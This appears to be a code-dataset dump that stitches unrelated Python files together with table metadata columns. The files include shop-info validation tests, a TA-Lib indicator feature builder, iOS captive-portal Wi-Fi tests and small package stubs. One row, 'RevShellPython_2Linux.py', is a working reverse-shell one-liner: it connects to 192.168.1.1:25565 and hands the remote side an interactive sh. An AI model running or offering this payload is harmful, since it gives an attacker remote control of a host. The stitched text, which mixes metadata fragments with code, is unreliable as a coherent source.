# NOTE: the "shoipinfo" spelling in the next four names is kept as-is so
# test discovery/selection by name keeps working.
def test_shoipinfo_phone_for_invalid_value1():
    _assert_invalid_phone(-7855326350)


def test_shoipinfo_phone_for_invalid_value2():
    _assert_invalid_phone(0)


def test_shoipinfo_phone_for_invalid_value3():
    _assert_invalid_phone(123412341234)


def test_shoipinfo_phone_for_invalid_value4():
    _assert_invalid_phone(-412341234)


def test_shopinfo_phone_for_invalid_value5():
    _assert_invalid_phone(None)


def test_shopinfo_phone_for_invalid_type():
    _assert_invalid_phone(str(PHONE))
def _assert_invalid_email(bad_email):
    """get_email raises ValueError; the other getters still return their values."""
    info = impl.ShopInfo(NAME, PHONE, bad_email, URL)
    nose.tools.assert_equal(info.get_name(), NAME)
    nose.tools.assert_equal(info.get_phone(), PHONE)
    nose.tools.assert_raises(ValueError, info.get_email)
    nose.tools.assert_equal(info.get_website(), URL)


def test_shopinfo_email_for_invalid_value1():
    _assert_invalid_email("harry")


def test_shopinfo_email_for_invalid_value2():
    _assert_invalid_email("a@b@c")


def test_shopinfo_email_for_invalid_value3():
    _assert_invalid_email("john..doe@example.com")


def test_shopinfo_email_for_invalid_value4():
    _assert_invalid_email("john.doe@example..com")


def test_shopinfo_email_for_invalid_value5():
    _assert_invalid_email("john/doe@example..com")


def test_shopinfo_email_for_invalid_value6():
    _assert_invalid_email(None)


def test_shopinfo_email_for_invalid_value7():
    _assert_invalid_email("b")


def test_shopinfo_email_for_invalid_value8():
    _assert_invalid_email("b@")


def test_shopinfo_email_for_invalid_value9():
    _assert_invalid_email("@a")


def test_shopinfo_email_for_invalid_type():
    _assert_invalid_email(1234)
def _assert_invalid_website(bad_url):
    """get_website raises ValueError; the other getters still return their values."""
    info = impl.ShopInfo(NAME, PHONE, EMAIL, bad_url)
    nose.tools.assert_equal(info.get_name(), NAME)
    nose.tools.assert_equal(info.get_phone(), PHONE)
    nose.tools.assert_equal(info.get_email(), EMAIL)
    nose.tools.assert_raises(ValueError, info.get_website)


def test_shopinfo_website_for_invalid_value1():
    _assert_invalid_website("ksu")


def test_shopinfo_website_for_invalid_value2():
    _assert_invalid_website("http://ksu%$^")


def test_shopinfo_website_for_invalid_value3():
    _assert_invalid_website(None)


def test_shopinfo_website_for_invalid_type():
    _assert_invalid_website(1234)
| 35.26506
| 86
| 0.72506
| 1,687
| 11,708
| 4.774155
| 0.074096
| 0.146387
| 0.243978
| 0.213558
| 0.911597
| 0.902533
| 0.889123
| 0.833375
| 0.788552
| 0.778123
| 0
| 0.029221
| 0.143577
| 11,708
| 331
| 87
| 35.371601
| 0.77401
| 0.006833
| 0
| 0.585366
| 0
| 0
| 0.039322
| 0.005421
| 0
| 0
| 0
| 0
| 0.544715
| 1
| 0.150407
| false
| 0
| 0.00813
| 0
| 0.158537
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
006c8ad5b7c9fb5d8b98c582b2a3b6aa7909e52f
| 4,412
|
py
|
Python
|
umigame/nlp/deprecate.py
|
penguinwang96825/Umigame
|
98d647ab6f40df08fe31d6b3bc444afe229a914e
|
[
"Apache-2.0"
] | null | null | null |
umigame/nlp/deprecate.py
|
penguinwang96825/Umigame
|
98d647ab6f40df08fe31d6b3bc444afe229a914e
|
[
"Apache-2.0"
] | null | null | null |
umigame/nlp/deprecate.py
|
penguinwang96825/Umigame
|
98d647ab6f40df08fe31d6b3bc444afe229a914e
|
[
"Apache-2.0"
] | 1
|
2021-11-01T14:35:32.000Z
|
2021-11-01T14:35:32.000Z
|
import talib
import itertools
import pandas as pd
def generate_feature(price_df):
    """Build a frame of TA-Lib momentum-indicator features from OHLC price data.

    Parameters
    ----------
    price_df : pd.DataFrame
        Must contain "high", "low" and "close" columns (numeric).

    Returns
    -------
    pd.DataFrame
        Only the newly generated indicator columns (the input columns are
        excluded), indexed like ``price_df``, with the indicator warm-up
        NaNs back-filled from the first valid value.
    """
    high = price_df["high"].values
    low = price_df["low"].values
    close = price_df["close"].values
    index = price_df.index

    # Collect all feature Series and concatenate once at the end: the original
    # pd.concat-per-column pattern was accidentally O(n^2) in column count.
    features = []

    def add(name, values):
        # One new feature column; leading NaNs are back-filled below.
        features.append(pd.Series(values, name=name, index=index))

    for t in range(7, 22):
        add(f"ADX_{t}", talib.ADX(high, low, close, timeperiod=t))
    for t in range(7, 22):
        add(f"ADXR_{t}", talib.ADXR(high, low, close, timeperiod=t))
    # APO sweeps every fast/slow combination ...
    for f, s in itertools.product(range(10, 15), range(25, 30)):
        add(f"APO_{f}_{s}", talib.APO(close, fastperiod=f, slowperiod=s, matype=0))
    for t in range(7, 22):
        add(f"AROONOSC_{t}", talib.AROONOSC(high, low, timeperiod=t))
    for t in range(7, 22):
        add(f"CCI_{t}", talib.CCI(high, low, close, timeperiod=t))
    for t in range(7, 22):
        add(f"CMO_{t}", talib.CMO(close, timeperiod=t))
    for t in range(7, 22):
        add(f"DX_{t}", talib.DX(high, low, close, timeperiod=t))
    for t in range(7, 22):
        add(f"MINUS_DI_{t}", talib.MINUS_DI(high, low, close, timeperiod=t))
    for t in range(7, 22):
        add(f"MINUS_DM_{t}", talib.MINUS_DM(high, low, timeperiod=t))
    for t in range(7, 22):
        add(f"MOM_{t}", talib.MOM(close, timeperiod=t))
    for t in range(7, 22):
        add(f"PLUS_DI_{t}", talib.PLUS_DI(high, low, close, timeperiod=t))
    for t in range(7, 22):
        add(f"PLUS_DM_{t}", talib.PLUS_DM(high, low, timeperiod=t))
    # ... while PPO only pairs them element-wise via zip.  Preserved as-is.
    # NOTE(review): the zip may have been intended to be a product like APO's
    # loop above -- confirm before widening it.
    for f, s in zip(range(10, 15), range(25, 30)):
        add(f"PPO_{f}_{s}", talib.PPO(close, fastperiod=f, slowperiod=s, matype=0))
    for t in range(7, 22):
        add(f"ROC_{t}", talib.ROC(close, timeperiod=t))
    for t in range(7, 22):
        add(f"ROCP_{t}", talib.ROCP(close, timeperiod=t))
    for t in range(6, 22):
        add(f"ROCR100_{t}", talib.ROCR100(close, timeperiod=t))
    for t in range(5, 22):
        add(f"RSI_{t}", talib.RSI(close, timeperiod=t))
    for t1, t2, t3 in itertools.product(range(5, 10), range(10, 15), range(25, 30)):
        add(f"ULTOSC_{t1}_{t2}_{t3}",
            talib.ULTOSC(high, low, close, timeperiod1=t1, timeperiod2=t2, timeperiod3=t3))
    for t in range(5, 22):
        add(f"WILLR_{t}", talib.WILLR(high, low, close, timeperiod=t))

    feature_df = pd.concat(features, axis=1)
    # Back-fill the indicator warm-up NaNs; only new columns are returned,
    # matching the original's exclusion of the input price columns.
    return feature_df.bfill()
| 58.826667
| 161
| 0.659565
| 718
| 4,412
| 3.906685
| 0.107242
| 0.208556
| 0.189661
| 0.128699
| 0.805704
| 0.746881
| 0.738681
| 0.670945
| 0.649554
| 0.621747
| 0
| 0.031579
| 0.181777
| 4,412
| 75
| 162
| 58.826667
| 0.745429
| 0.0068
| 0
| 0.492754
| 1
| 0
| 0.044967
| 0.004793
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014493
| false
| 0
| 0.043478
| 0
| 0.072464
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
979610a75a9969078299218d0f4d42e4a76282ac
| 17,066
|
py
|
Python
|
tests/e2e/interOp/captive_portal/bridge_mode/ios/test_captive_portal_modes.py
|
Telecominfraproject/wlan-testing
|
32b95f41a79f53958b7641eeed5bcd16af96908c
|
[
"BSD-3-Clause"
] | 7
|
2020-08-19T16:45:46.000Z
|
2022-02-10T09:55:22.000Z
|
tests/e2e/interOp/captive_portal/bridge_mode/ios/test_captive_portal_modes.py
|
Telecominfraproject/wlan-testing
|
32b95f41a79f53958b7641eeed5bcd16af96908c
|
[
"BSD-3-Clause"
] | 47
|
2020-12-20T16:06:03.000Z
|
2022-03-23T03:01:22.000Z
|
tests/e2e/interOp/captive_portal/bridge_mode/ios/test_captive_portal_modes.py
|
Telecominfraproject/wlan-testing
|
32b95f41a79f53958b7641eeed5bcd16af96908c
|
[
"BSD-3-Clause"
] | 9
|
2021-02-04T22:32:06.000Z
|
2021-12-14T17:45:51.000Z
|
from logging import exception
import io
import unittest
import warnings
from perfecto.test import TestResultFactory
import pytest
import sys
import time
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.by import By
from appium import webdriver
from selenium.common.exceptions import NoSuchElementException
import sys
import allure
if 'perfecto_libs' not in sys.path:
sys.path.append(f'../libs/perfecto_libs')
from iOS_lib import closeApp, openApp, get_WifiIPAddress_iOS, ForgetWifiConnection, ping_deftapps_iOS, \
Toggle_AirplaneMode_iOS, set_APconnMobileDevice_iOS, verify_APconnMobileDevice_iOS, Toggle_WifiMode_iOS, tearDown,\
verifyUploadDownloadSpeediOS, get_ip_address_ios, captive_portal_ios, wifi_connect, wifi_disconnect_and_forget
pytestmark = [pytest.mark.sanity, pytest.mark.interop, pytest.mark.ios, pytest.mark.interop_ios,
pytest.mark.captive_portal, pytest.mark.interop_uc_sanity, pytest.mark.bridge]
# AP profiles applied for this suite.
# FIX: the key must be "wpa2_personal" -- every WPA2 test in this file indexes
# setup_params_general["ssid_modes"]["wpa2_personal"], so the previous "wpa2"
# key made those tests fail with a KeyError before any device work ran.
setup_params_general = {
    "mode": "BRIDGE",
    "ssid_modes": {
        "open": [{"ssid_name": "captive_open_2g", "appliedRadios": ["2G"]},
                 {"ssid_name": "captive_open_5g", "appliedRadios": ["5G"]}],
        "wpa": [{"ssid_name": "captive_wpa_2g", "appliedRadios": ["2G"], "security_key": "lanforge"},
                {"ssid_name": "captive_wpa_5g", "appliedRadios": ["5G"],
                 "security_key": "lanforge"}],
        # NOTE(review): "captive2_wpa_5g" looks like a typo for
        # "captive_wpa2_5g" -- confirm against the AP configuration before
        # renaming, since the SSID string must match what the AP broadcasts.
        "wpa2_personal": [{"ssid_name": "captive_wpa2_2g", "appliedRadios": ["2G"], "security_key": "lanforge"},
                          {"ssid_name": "captive2_wpa_5g", "appliedRadios": ["5G"],
                           "security_key": "lanforge"}],
        "wpa3_personal": [
            {"ssid_name": "captive_wpa3_2g", "appliedRadios": ["2G"], "security_key": "lanforge"},
            {"ssid_name": "captive_wpa3_5g", "appliedRadios": ["5G"],
             "security_key": "lanforge"}]},
    "rf": {},
    "radius": False
}
@allure.suite(suite_name="interop sanity")
@allure.sub_suite(sub_suite_name="Bridge Mode Captive Portal : Suite-A")
@pytest.mark.InteropsuiteA
@allure.feature("BRIDGE MODE CAPTIVE PORTAL")
# @pytest.mark.parametrize(
#     'setup_profiles',
#     [setup_params_general],
#     indirect=True,
#     scope="class"
# )
#@pytest.mark.usefixtures("setup_profiles")
class TestBridgeModeCaptivePortalSuiteOneBridge(object):
    """ Captive Portal SuiteA
        pytest -m "captive portal and bridge and InteropsuiteA"

    Every test follows the same recipe (connect to a captive-portal SSID on
    the iOS device, verify internet access and throughput, then forget the
    network), so the shared body lives in ``_run_captive_portal_case`` and
    each test only supplies its SSID profile.
    """

    def _run_captive_portal_case(self, request, profile_data, get_vif_state,
                                 setup_perfectoMobile_iOS, connData):
        """Shared captive-portal flow for one SSID profile.

        Connects the iOS device to ``profile_data["ssid_name"]``, asserts
        internet access and upload/download speed, then disconnects and
        forgets the network.  Fails the test when no internet is reached.
        """
        ssidName = profile_data["ssid_name"]
        # Open SSIDs carry no security key; the Perfecto helpers expect the
        # literal "[BLANK]" marker in that case.
        ssidPassword = profile_data.get("security_key", "[BLANK]")
        print("SSID_NAME: " + ssidName)
        print("SSID_PASS: " + ssidPassword)
        # NOTE(review): appending ssidName first makes the "not in" check
        # below unconditionally False, so the xfail path is currently dead.
        # Preserved as-is -- confirm whether the append was meant to be
        # removed before re-enabling the vif-state guard.
        get_vif_state.append(ssidName)
        if ssidName not in get_vif_state:
            allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
            pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
        # Set Wifi/AP Mode
        ip, is_internet = captive_portal_ios(request, ssidName, ssidPassword,
                                             setup_perfectoMobile_iOS, connData)
        if is_internet:
            if ip:
                text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
            else:
                # FIX: added the missing space before "with" in the message.
                text_body = ("connected to " + ssidName + " with Internet, couldn't get IP address")
            print(text_body)
            allure.attach(name="Connection Status: ", body=str(text_body))
            assert verifyUploadDownloadSpeediOS(request, setup_perfectoMobile_iOS, connData)
            wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_iOS, connData)
        else:
            allure.attach(name="Connection Status: ", body=str("No Internet access"))
            assert False

    @allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-5179", name="WIFI-5179")
    @pytest.mark.twog
    @pytest.mark.open
    def test_Captive_Portal_Open_2g_BRIDGE(self, request, get_vif_state, get_ap_logs, get_APToMobileDevice_data,
                                           setup_perfectoMobile_iOS):
        """Open SSID, 2.4 GHz radio."""
        self._run_captive_portal_case(request, setup_params_general["ssid_modes"]["open"][0],
                                      get_vif_state, setup_perfectoMobile_iOS, get_APToMobileDevice_data)

    @allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-5146", name="WIFI-5146")
    @pytest.mark.fiveg
    @pytest.mark.open
    def test_Captive_Portal_Open_5g_BRIDGE(self, request, get_vif_state, get_ap_logs, get_APToMobileDevice_data,
                                           setup_perfectoMobile_iOS):
        """Open SSID, 5 GHz radio."""
        self._run_captive_portal_case(request, setup_params_general["ssid_modes"]["open"][1],
                                      get_vif_state, setup_perfectoMobile_iOS, get_APToMobileDevice_data)

    @allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-5182", name="WIFI-5182")
    @pytest.mark.twog
    @pytest.mark.wpa
    def test_Captive_Portal_WPA_2g_Bridge(self, request, get_vif_state, get_ap_logs, get_APToMobileDevice_data,
                                          setup_perfectoMobile_iOS):
        """WPA SSID, 2.4 GHz radio."""
        self._run_captive_portal_case(request, setup_params_general["ssid_modes"]["wpa"][0],
                                      get_vif_state, setup_perfectoMobile_iOS, get_APToMobileDevice_data)

    @allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-5149", name="WIFI-5149")
    @pytest.mark.fiveg
    @pytest.mark.wpa
    def test_Captive_Portal_WPA_5g_Bridge(self, request, get_vif_state, get_ap_logs, get_APToMobileDevice_data,
                                          setup_perfectoMobile_iOS):
        """WPA SSID, 5 GHz radio."""
        self._run_captive_portal_case(request, setup_params_general["ssid_modes"]["wpa"][1],
                                      get_vif_state, setup_perfectoMobile_iOS, get_APToMobileDevice_data)

    @allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-5186", name="WIFI-5186")
    @pytest.mark.twog
    @pytest.mark.wpa2_personal
    def test_Captive_Portal_WPA2_2g_Personal_Bridge(self, request, get_vif_state, get_ap_logs,
                                                    get_APToMobileDevice_data,
                                                    setup_perfectoMobile_iOS):
        """WPA2-personal SSID, 2.4 GHz radio."""
        self._run_captive_portal_case(request, setup_params_general["ssid_modes"]["wpa2_personal"][0],
                                      get_vif_state, setup_perfectoMobile_iOS, get_APToMobileDevice_data)

    @allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-5153", name="WIFI-5153")
    @pytest.mark.fiveg
    @pytest.mark.wpa2_personal
    def test_Captive_Portal_WPA2_5g_Personal_Bridge(self, request, get_vif_state, get_ap_logs,
                                                    get_APToMobileDevice_data,
                                                    setup_perfectoMobile_iOS):
        """WPA2-personal SSID, 5 GHz radio."""
        self._run_captive_portal_case(request, setup_params_general["ssid_modes"]["wpa2_personal"][1],
                                      get_vif_state, setup_perfectoMobile_iOS, get_APToMobileDevice_data)

    @allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-5130", name="WIFI-5130")
    @pytest.mark.twog
    @pytest.mark.wpa3_personal
    def test_Captive_Portal_WPA3_2g_Personal_Bridge(self, request, get_vif_state, get_ap_logs,
                                                    get_APToMobileDevice_data,
                                                    setup_perfectoMobile_iOS):
        """WPA3-personal SSID, 2.4 GHz radio."""
        self._run_captive_portal_case(request, setup_params_general["ssid_modes"]["wpa3_personal"][0],
                                      get_vif_state, setup_perfectoMobile_iOS, get_APToMobileDevice_data)

    @allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-5140", name="WIFI-5140")
    @pytest.mark.sg123
    @pytest.mark.fiveg
    @pytest.mark.wpa3_personal
    def test_Captive_Portal_WPA3_5g_Personal_Bridge(self, request, get_vif_state, get_ap_logs,
                                                    get_APToMobileDevice_data,
                                                    setup_perfectoMobile_iOS):
        """WPA3-personal SSID, 5 GHz radio."""
        self._run_captive_portal_case(request, setup_params_general["ssid_modes"]["wpa3_personal"][1],
                                      get_vif_state, setup_perfectoMobile_iOS, get_APToMobileDevice_data)
| 48.76
| 119
| 0.647076
| 1,892
| 17,066
| 5.575581
| 0.082981
| 0.036402
| 0.100104
| 0.068253
| 0.866054
| 0.855057
| 0.841028
| 0.833444
| 0.815243
| 0.782159
| 0
| 0.010413
| 0.251553
| 17,066
| 350
| 120
| 48.76
| 0.81547
| 0.021739
| 0
| 0.782007
| 0
| 0
| 0.194454
| 0.00126
| 0
| 0
| 0
| 0
| 0.055363
| 1
| 0.027682
| false
| 0.110727
| 0.051903
| 0
| 0.083045
| 0.083045
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
c150e81191b0431daba753fbff16f307710bfae7
| 169
|
py
|
Python
|
src/app/models/__init__.py
|
RdevJ/headquater
|
2da2290560b030f7ce365e1b71affd637fb9cab4
|
[
"MIT"
] | null | null | null |
src/app/models/__init__.py
|
RdevJ/headquater
|
2da2290560b030f7ce365e1b71affd637fb9cab4
|
[
"MIT"
] | null | null | null |
src/app/models/__init__.py
|
RdevJ/headquater
|
2da2290560b030f7ce365e1b71affd637fb9cab4
|
[
"MIT"
] | null | null | null |
import app.models.tag # noqa
import app.models.article # noqa
import app.models.answer # noqa
import app.models.question # noqa
import app.models.statistics # noqa
| 28.166667
| 36
| 0.763314
| 25
| 169
| 5.16
| 0.36
| 0.348837
| 0.581395
| 0.589147
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.147929
| 169
| 5
| 37
| 33.8
| 0.895833
| 0.142012
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
c1772a8deb5d6b2f45c5a62291f01f071685bf33
| 118
|
py
|
Python
|
neuralgym/ops/__init__.py
|
autocomic/neuralgym
|
de7088214eed65e789e4a062f643049b55386485
|
[
"MIT"
] | 98
|
2018-02-14T17:23:43.000Z
|
2022-03-29T12:55:40.000Z
|
neuralgym/ops/__init__.py
|
autocomic/neuralgym
|
de7088214eed65e789e4a062f643049b55386485
|
[
"MIT"
] | 11
|
2018-03-02T01:27:07.000Z
|
2022-01-05T12:04:45.000Z
|
neuralgym/ops/__init__.py
|
autocomic/neuralgym
|
de7088214eed65e789e4a062f643049b55386485
|
[
"MIT"
] | 77
|
2018-02-18T11:16:48.000Z
|
2022-03-30T01:04:21.000Z
|
from . import summary_ops
from . import loss_ops
from . import image_ops
from . import layers
from . import train_ops
| 19.666667
| 25
| 0.788136
| 19
| 118
| 4.684211
| 0.421053
| 0.561798
| 0.438202
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.169492
| 118
| 5
| 26
| 23.6
| 0.908163
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c17d0bdd5bf0af5f43a0985ce61edab5ab028726
| 218
|
py
|
Python
|
ReverShell Collection/Linux Based Attack/RevShellPython_2Linux.py
|
cometteetcaramel/Simple-ReverseShell-Collect
|
948c2344edb59580c5466ab00a58600522afc16b
|
[
"MIT"
] | 1
|
2021-05-22T20:06:42.000Z
|
2021-05-22T20:06:42.000Z
|
ReverShell Collection/Linux Based Attack/RevShellPython_2Linux.py
|
cometteetcaramel/Simple-ReverseShell-Collect
|
948c2344edb59580c5466ab00a58600522afc16b
|
[
"MIT"
] | null | null | null |
ReverShell Collection/Linux Based Attack/RevShellPython_2Linux.py
|
cometteetcaramel/Simple-ReverseShell-Collect
|
948c2344edb59580c5466ab00a58600522afc16b
|
[
"MIT"
] | null | null | null |
# Reverse-shell PoC (Linux): opens a TCP connection back to 192.168.1.1:25565,
# duplicates the socket onto stdin/stdout/stderr, then spawns "sh" via pty so
# the remote end gets an interactive shell.  For authorized security testing
# and lab use only.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.1",25565));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
| 218
| 218
| 0.715596
| 42
| 218
| 3.666667
| 0.547619
| 0.116883
| 0.136364
| 0.253247
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089623
| 0.027523
| 218
| 1
| 218
| 218
| 0.636792
| 0
| 0
| 0
| 0
| 1
| 0.940639
| 0.808219
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 1
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
c18dc8242faabfbda8c84af0da8494e5b4c8da18
| 41
|
py
|
Python
|
src/lib/posixpath.py
|
DTenore/skulpt
|
098d20acfb088d6db85535132c324b7ac2f2d212
|
[
"MIT"
] | 2,671
|
2015-01-03T08:23:25.000Z
|
2022-03-31T06:15:48.000Z
|
src/lib/posixpath.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 972
|
2015-01-05T08:11:00.000Z
|
2022-03-29T13:47:15.000Z
|
src/lib/posixpath.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 845
|
2015-01-03T19:53:36.000Z
|
2022-03-29T18:34:22.000Z
|
# Skulpt stub: posixpath is not available in this runtime; _sk_fail._
# presumably raises an import-failure error naming the module -- see
# Skulpt's _sk_fail helper for the exact exception raised.
import _sk_fail; _sk_fail._("posixpath")
| 20.5
| 40
| 0.780488
| 6
| 41
| 4.5
| 0.666667
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073171
| 41
| 1
| 41
| 41
| 0.710526
| 0
| 0
| 0
| 0
| 0
| 0.219512
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.